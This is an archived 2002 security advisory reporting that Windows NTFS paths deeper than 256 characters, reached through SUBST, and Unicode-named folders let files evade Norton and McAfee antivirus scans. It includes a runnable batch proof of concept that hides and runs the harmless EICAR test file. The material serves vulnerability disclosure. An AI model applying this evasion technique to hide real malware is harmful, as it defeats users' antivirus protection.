30th Jan 2002 [SBWID-5048]
COMMAND
Windows long pathnames/Unicode may be exploited to hide files such as
virus
SYSTEMS AFFECTED
Windows NT 4.0 SP4
Windows NT 4.0 SP6a
Windows 2000 Professional SP2
Windows XP Pro
Tested with :
Norton AntiVirus 5.0
Norton AntiVirus 7.5.1
Norton Antivirus 8.00.58
PROBLEM
In Hans Somers post :
The filesystem NTFS seems to be a hiding place for virusses if you use
a file path which exceeds 256 charaters.
The filepath (drive + folderpath + filename) theoraticly can take up to
32000 charaters if the filesystem in use is NTFS. However, the way in
wich Windows access this filesystem a maximum of 256 characters is in
place. If you try to go deeper, you will experience a \"Path too long\"
error. In these Operating System there is a way to substitute a long
folderpath, using the \"SUBST\" command. If you change your current
drive to the substituted drive, the pathlength is reset to 3 (Q:\\
e.g.) and Windows NT allows you to create an even deeper path.
Normally this would not alarm anyone, however, i discovered that my
favorite virusscanner (Norton AntiVirus) was not able to follow the
deep path where i created the EICAR-test string. So i created a very
simple batchfile to demonstrate this exploit. My virusscanner will only
find this virus is the SUBST drive is availible during the scan.
After running the script below, remove the substituted drive (SUBST Q:
/D) and run a full scan on your C-partition. I suspect that the
Eicar-virus will not be found. Additionally, re-create the substituted
drive and re-run the scan. Under normal conditions the Eicar-virus will
be found and removed(depending on your settings).
Sample script:
=============
@echo off
cls
echo Start test-script NTFS-limit
@echo Create a filepath to the limit of NTFS
md c:\\temp\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\123456789
cd c:\\temp\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\123456789
@echo Create the Eicar test-string for PoC. This should be detected normally if you have an active virusscanner.
echo X5O!P%%@AP[4\\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR1.COM >NUL
@echo Create a subst-drive Q: for this path
subst Q: c:\\temp\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\1234567890\\123456789
@echo Create e even deeper filepath (thus exceeding the limit of NTFS\'s explorer)
md Q:\\1234567890\\1234567890\\1234567890
@echo Change current folder into \"the deep\"
Q:
cd Q:\\1234567890\\1234567890\\1234567890
@echo Create the Eicar test-string
echo X5O!P%%@AP[4\\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > EICAR.TXT
echo. >>EICAR.TXT
@echo Activate the Eicar test-string
copy EICAR.TXT EICAR2.COM >NUL
EICAR2.COM
echo .
echo End of test-script
Update (07 Februray 2002)
======
Christophe Bousquet added :
Actually, you don\'t have to deal with long path name.
Here\'s a little experiment I\'ve just done :
- a file with something that triggers my MacAfee VirusScan NT, put it
in
folder \"Hello\". Start scan : no problem, VirusScan warns me about
the dangerous thing.
- same file, in folder called \"nihongo\", but labeled using japanese
characters i.e. a folder with a unicode name. Start scan : nothing!
No warning, because (i guess) no scan at all.
SOLUTION
None yet
TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH
